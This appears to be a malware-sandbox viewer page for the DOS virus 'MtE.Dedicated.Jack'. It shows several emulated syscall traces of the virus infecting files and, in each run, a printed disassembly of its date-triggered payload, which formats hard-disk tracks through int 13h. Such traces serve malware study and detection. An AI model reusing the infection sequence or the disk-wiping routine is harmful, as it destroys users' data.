Sample viewer

vx.netlux.org/Virus.DOS.MtE.Dedicated.Jack

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:54:47.160850101Z 26 PC: 12f66 | Set disk transfer address
2018-12-17T21:54:47.161988529Z 53 PC: 12f6b | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:54:47.163950197Z 37 PC: 12f75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:54:47.165130798Z 78 PC: 12f86 | Find first file
2018-12-17T21:54:47.169365939Z 67 PC: 13009 | Get or set file attributes
2018-12-17T21:54:47.187486084Z 61 PC: 13010 | Open file (Filename = ' P!v')
2018-12-17T21:54:47.194022381Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:54:47.200725888Z 66 PC: 13035 | Move file pointer
2018-12-17T21:54:47.202073626Z 87 PC: 1304b | Get or set file date and time
2018-12-17T21:54:47.213315446Z 64 PC: 1307e | Write file or device (Write 3177 bytes on handle 5)
2018-12-17T21:54:47.224115604Z 66 PC: 1308d | Move file pointer
2018-12-17T21:54:47.226007466Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:54:47.228669919Z 87 PC: 1309e | Get or set file date and time
2018-12-17T21:54:47.230063728Z 62 PC: 130a2 | Close file
2018-12-17T21:54:47.237937295Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-17T21:54:47.240574146Z 79 PC: 12f86 | Find next file
2018-12-17T21:54:47.243443892Z 67 PC: 13009 | Get or set file attributes
2018-12-17T21:54:47.254117348Z 61 PC: 13010 | Open file (Filename = 'cXv:L#…')
2018-12-17T21:54:47.26047739Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:54:47.266563791Z 66 PC: 13035 | Move file pointer
2018-12-17T21:54:47.268673516Z 87 PC: 1304b | Get or set file date and time
2018-12-17T21:54:47.276093038Z 64 PC: 1307e | Write file or device (Write 3301 bytes on handle 5)
2018-12-17T21:54:47.285053399Z 66 PC: 1308d | Move file pointer
2018-12-17T21:54:47.287047444Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:54:47.293819324Z 87 PC: 1309e | Get or set file date and time
2018-12-17T21:54:47.295249666Z 62 PC: 130a2 | Close file
2018-12-17T21:54:47.303118245Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-17T21:54:47.305196516Z 79 PC: 12f86 | Find next file
2018-12-17T21:54:47.307731682Z 67 PC: 13009 | Get or set file attributes
2018-12-17T21:54:47.318704758Z 61 PC: 13010 | Open file (Filename = 'nH )ȚNiޔXM'!t &y{UL)x1<ŪϦztϻ.Җz 1h@MqŖᤕWA.ufץ!CEϩ6FGŢjv])m ')
2018-12-17T21:54:47.325261801Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:54:47.331877339Z 66 PC: 13035 | Move file pointer
2018-12-17T21:54:47.334260718Z 87 PC: 1304b | Get or set file date and time
2018-12-17T21:54:47.340189741Z 64 PC: 1307e | Write file or device (Write 3236 bytes on handle 5)
2018-12-17T21:54:47.348740116Z 66 PC: 1308d | Move file pointer
2018-12-17T21:54:47.351046848Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:54:47.357567055Z 87 PC: 1309e | Get or set file date and time
2018-12-17T21:54:47.359300293Z 62 PC: 130a2 | Close file
2018-12-17T21:54:47.368331091Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-17T21:54:47.370920505Z 79 PC: 12f86 | Find next file
2018-12-17T21:54:47.374335847Z 67 PC: 13009 | Get or set file attributes
2018-12-17T21:54:47.389950004Z 61 PC: 13010 | Open file (Filename = 'Et%[|M[VdD=K ӥR}K<&&e['M6ۿӿAI]滒Ψ2լ7Xw9 Մ}&8(Kыh>Wh8 4]ٓ!M2[@[ 7h /fv ՄqK')
2018-12-17T21:54:47.397697472Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:54:47.40400351Z 66 PC: 13035 | Move file pointer
2018-12-17T21:54:47.406455752Z 87 PC: 1304b | Get or set file date and time
2018-12-17T21:54:47.413169367Z 64 PC: 1307e | Write file or device (Write 3299 bytes on handle 5)
2018-12-17T21:54:47.425579187Z 66 PC: 1308d | Move file pointer
2018-12-17T21:54:47.427238485Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:54:47.434327365Z 87 PC: 1309e | Get or set file date and time
2018-12-17T21:54:47.435837988Z 62 PC: 130a2 | Close file
2018-12-17T21:54:47.444268196Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-17T21:54:47.447142575Z 37 PC: 12fee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:54:47.448698695Z 26 PC: 12ff7 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":515,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:03.003812763Z 26 PC: 12f66 | Set disk transfer address
2018-12-25T11:41:03.006473512Z 53 PC: 12f6b | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.008108054Z 37 PC: 12f75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.009720304Z 78 PC: 12f86 | Find first file
2018-12-25T11:41:03.016938819Z 67 PC: 13009 | Get or set file attributes
2018-12-25T11:41:03.033325413Z 61 PC: 13010 | Open file (Filename = ' P!v')
2018-12-25T11:41:03.040112241Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:03.047648379Z 66 PC: 13035 | Move file pointer
2018-12-25T11:41:03.049258278Z 87 PC: 1304b | Get or set file date and time
2018-12-25T11:41:03.056797141Z 64 PC: 1307e | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T11:41:03.065174387Z 66 PC: 1308d | Move file pointer
2018-12-25T11:41:03.066817483Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:03.069656659Z 87 PC: 1309e | Get or set file date and time
2018-12-25T11:41:03.071333766Z 62 PC: 130a2 | Close file
2018-12-25T11:41:03.079360669Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-25T11:41:03.081687722Z 79 PC: 12f86 | Find next file (See above)
2018-12-25T11:41:03.084477637Z 67 PC: 13009 | Get or set file attributes (See above)
2018-12-25T11:41:03.094696415Z 61 PC: 13010 | Open file (See above)
2018-12-25T11:41:03.101955993Z 63 PC: 1301d | Read file or device (See above)
2018-12-25T11:41:03.10897232Z 66 PC: 13035 | Move file pointer (See above)
2018-12-25T11:41:03.111535951Z 87 PC: 1304b | Get or set file date and time (See above)
2018-12-25T11:41:03.117883054Z 64 PC: 1307e | Write file or device (See above)
2018-12-25T11:41:03.126766417Z 66 PC: 1308d | Move file pointer (See above)
2018-12-25T11:41:03.136765909Z 64 PC: 13097 | Write file or device (See above)
2018-12-25T11:41:03.143210615Z 87 PC: 1309e | Get or set file date and time (See above)
2018-12-25T11:41:03.144680734Z 62 PC: 130a2 | Close file (See above)
2018-12-25T11:41:03.154386577Z 42 PC: 12f9b | Get date (See above)
2018-12-25T11:41:03.156955394Z 79 PC: 12f86 | Find next file (See above)
2018-12-25T11:41:03.159920594Z 67 PC: 13009 | Get or set file attributes (See above)
2018-12-25T11:41:03.170314591Z 61 PC: 13010 | Open file (See above)
2018-12-25T11:41:03.176878803Z 63 PC: 1301d | Read file or device (See above)
2018-12-25T11:41:03.183202373Z 66 PC: 13035 | Move file pointer (See above)
2018-12-25T11:41:03.185388153Z 87 PC: 1304b | Get or set file date and time (See above)
2018-12-25T11:41:03.210442843Z 64 PC: 1307e | Write file or device (See above)
2018-12-25T11:41:03.220222586Z 66 PC: 1308d | Move file pointer (See above)
2018-12-25T11:41:03.236054917Z 64 PC: 13097 | Write file or device (See above)
2018-12-25T11:41:03.243204357Z 87 PC: 1309e | Get or set file date and time (See above)
2018-12-25T11:41:03.24485379Z 62 PC: 130a2 | Close file (See above)
2018-12-25T11:41:03.264968373Z 42 PC: 12f9b | Get date (See above)
2018-12-25T11:41:03.267972489Z 79 PC: 12f86 | Find next file (See above)
2018-12-25T11:41:03.271039979Z 67 PC: 13009 | Get or set file attributes (See above)
2018-12-25T11:41:03.282367986Z 61 PC: 13010 | Open file (See above)
2018-12-25T11:41:03.290170179Z 63 PC: 1301d | Read file or device (See above)
2018-12-25T11:41:03.296138519Z 66 PC: 13035 | Move file pointer (See above)
2018-12-25T11:41:03.297504537Z 87 PC: 1304b | Get or set file date and time (See above)
2018-12-25T11:41:03.305416072Z 64 PC: 1307e | Write file or device (See above)
2018-12-25T11:41:03.314541216Z 66 PC: 1308d | Move file pointer (See above)
2018-12-25T11:41:03.31625078Z 64 PC: 13097 | Write file or device (See above)
2018-12-25T11:41:03.3238962Z 87 PC: 1309e | Get or set file date and time (See above)
2018-12-25T11:41:03.325763941Z 62 PC: 130a2 | Close file (See above)
2018-12-25T11:41:03.333796827Z 42 PC: 12f9b | Get date (See above)
2018-12-25T11:41:03.337072949Z 37 PC: 12fee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.338351023Z 26 PC: 12ff7 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":515,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:03.160059054Z 26 PC: 12f66 | Set disk transfer address
2018-12-25T11:41:03.162903145Z 53 PC: 12f6b | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.16413939Z 37 PC: 12f75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.165201464Z 78 PC: 12f86 | Find first file
2018-12-25T11:41:03.171732832Z 67 PC: 13009 | Get or set file attributes
2018-12-25T11:41:03.186780358Z 61 PC: 13010 | Open file (Filename = ' P!v')
2018-12-25T11:41:03.193228606Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:03.199958641Z 66 PC: 13035 | Move file pointer
2018-12-25T11:41:03.201006941Z 87 PC: 1304b | Get or set file date and time
2018-12-25T11:41:03.205439212Z 64 PC: 1307e | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T11:41:03.21149317Z 66 PC: 1308d | Move file pointer
2018-12-25T11:41:03.21287605Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:03.216274017Z 87 PC: 1309e | Get or set file date and time
2018-12-25T11:41:03.218046785Z 62 PC: 130a2 | Close file
2018-12-25T11:41:03.226298924Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-25T11:41:03.230223842Z 9 PC: 12fc9 | Display string (Could not find end pointer)
2018-12-25T11:41:03.240157869Z 76 PC: 12fcd | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":515,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:03.317539685Z 26 PC: 12f66 | Set disk transfer address
2018-12-25T11:41:03.319144446Z 53 PC: 12f6b | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.320186828Z 37 PC: 12f75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.321212907Z 78 PC: 12f86 | Find first file
2018-12-25T11:41:03.327235451Z 67 PC: 13009 | Get or set file attributes
2018-12-25T11:41:03.343022061Z 61 PC: 13010 | Open file (Filename = ' P!v')
2018-12-25T11:41:03.350413264Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:03.354916324Z 66 PC: 13035 | Move file pointer
2018-12-25T11:41:03.363568007Z 87 PC: 1304b | Get or set file date and time
2018-12-25T11:41:03.367974054Z 64 PC: 1307e | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T11:41:03.377817169Z 66 PC: 1308d | Move file pointer
2018-12-25T11:41:03.379903035Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:03.38300132Z 87 PC: 1309e | Get or set file date and time
2018-12-25T11:41:03.385237671Z 62 PC: 130a2 | Close file
2018-12-25T11:41:03.393496288Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-25T11:41:03.395526586Z 79 PC: 12f86 | Find next file (See above)
2018-12-25T11:41:03.398069106Z 67 PC: 13009 | Get or set file attributes (See above)
2018-12-25T11:41:03.416045987Z 61 PC: 13010 | Open file (See above)
2018-12-25T11:41:03.423745858Z 63 PC: 1301d | Read file or device (See above)
2018-12-25T11:41:03.430778567Z 66 PC: 13035 | Move file pointer (See above)
2018-12-25T11:41:03.432689157Z 87 PC: 1304b | Get or set file date and time (See above)
2018-12-25T11:41:03.438849956Z 64 PC: 1307e | Write file or device (See above)
2018-12-25T11:41:03.448668069Z 66 PC: 1308d | Move file pointer (See above)
2018-12-25T11:41:03.451360673Z 64 PC: 13097 | Write file or device (See above)
2018-12-25T11:41:03.457554509Z 87 PC: 1309e | Get or set file date and time (See above)
2018-12-25T11:41:03.460484463Z 62 PC: 130a2 | Close file (See above)
2018-12-25T11:41:03.468661126Z 42 PC: 12f9b | Get date (See above)
2018-12-25T11:41:03.471097296Z 79 PC: 12f86 | Find next file (See above)
2018-12-25T11:41:03.473876111Z 67 PC: 13009 | Get or set file attributes (See above)
2018-12-25T11:41:03.484197169Z 61 PC: 13010 | Open file (See above)
2018-12-25T11:41:03.49054895Z 63 PC: 1301d | Read file or device (See above)
2018-12-25T11:41:03.496571659Z 66 PC: 13035 | Move file pointer (See above)
2018-12-25T11:41:03.49898139Z 87 PC: 1304b | Get or set file date and time (See above)
2018-12-25T11:41:03.504669455Z 64 PC: 1307e | Write file or device (See above)
2018-12-25T11:41:03.513210622Z 66 PC: 1308d | Move file pointer (See above)
2018-12-25T11:41:03.514814833Z 64 PC: 13097 | Write file or device (See above)
2018-12-25T11:41:03.521495235Z 87 PC: 1309e | Get or set file date and time (See above)
2018-12-25T11:41:03.523242116Z 62 PC: 130a2 | Close file (See above)
2018-12-25T11:41:03.541495355Z 42 PC: 12f9b | Get date (See above)
2018-12-25T11:41:03.543651337Z 79 PC: 12f86 | Find next file (See above)
2018-12-25T11:41:03.546327352Z 67 PC: 13009 | Get or set file attributes (See above)
2018-12-25T11:41:03.555921318Z 61 PC: 13010 | Open file (See above)
2018-12-25T11:41:03.562779652Z 63 PC: 1301d | Read file or device (See above)
2018-12-25T11:41:03.5692222Z 66 PC: 13035 | Move file pointer (See above)
2018-12-25T11:41:03.571062249Z 87 PC: 1304b | Get or set file date and time (See above)
2018-12-25T11:41:03.578662475Z 64 PC: 1307e | Write file or device (See above)
2018-12-25T11:41:03.587880364Z 66 PC: 1308d | Move file pointer (See above)
2018-12-25T11:41:03.589482656Z 64 PC: 13097 | Write file or device (See above)
2018-12-25T11:41:03.596659154Z 87 PC: 1309e | Get or set file date and time (See above)
2018-12-25T11:41:03.598313472Z 62 PC: 130a2 | Close file (See above)
2018-12-25T11:41:03.606056245Z 42 PC: 12f9b | Get date (See above)
2018-12-25T11:41:03.609172583Z 25 PC: 12fde | Get default drive
2018-12-25T11:41:03.612127058Z 37 PC: 12fee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.613481007Z 26 PC: 12ff7 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":515,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:03.318901042Z 26 PC: 12f66 | Set disk transfer address
2018-12-25T11:41:03.321131629Z 53 PC: 12f6b | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.32249616Z 37 PC: 12f75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.323848158Z 78 PC: 12f86 | Find first file
2018-12-25T11:41:03.335260854Z 67 PC: 13009 | Get or set file attributes
2018-12-25T11:41:03.353418577Z 61 PC: 13010 | Open file (Filename = ' P!v')
2018-12-25T11:41:03.361215789Z 63 PC: 1301d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:03.370130458Z 66 PC: 13035 | Move file pointer
2018-12-25T11:41:03.380066296Z 87 PC: 1304b | Get or set file date and time
2018-12-25T11:41:03.387744828Z 64 PC: 1307e | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T11:41:03.398961746Z 66 PC: 1308d | Move file pointer
2018-12-25T11:41:03.401147102Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:03.404463196Z 87 PC: 1309e | Get or set file date and time
2018-12-25T11:41:03.406082302Z 62 PC: 130a2 | Close file
2018-12-25T11:41:03.415688449Z 42 PC: 12f9b | Get date 0x12f9b: cmp dh, 2
0x12f9e: jne 0x12fcd
0x12fa0: mov bx, 0x17f
0x12fa3: mov ch, 0
0x12fa5: mov dx, 0x80
0x12fa8: mov al, 0
0x12faa: mov cl, 6
0x12fac: shl al, cl
0x12fae: mov cl, al
0x12fb0: or cl, 1
0x12fb3: mov ax, 0x500
0x12fb6: int 0x13
0x12fb8: inc dh
0x12fba: cmp dh, 9
0x12fbd: jne 0x12fa8
0x12fbf: jmp 0x12fc2
0x12fc1: nop
0x12fc2: mov dx, 0x103
0x12fc5: mov ah, 9
0x12fc7: int 0x21
2018-12-25T11:41:03.420276751Z 9 PC: 12fc9 | Display string (String= '8l only wP@x◸ˆπ#ǕW葋ȋ+É=Njށ?NjuË##,')
2018-12-25T11:41:03.432796961Z 76 PC: 12fcd | Terminate with return code (Return code = '36')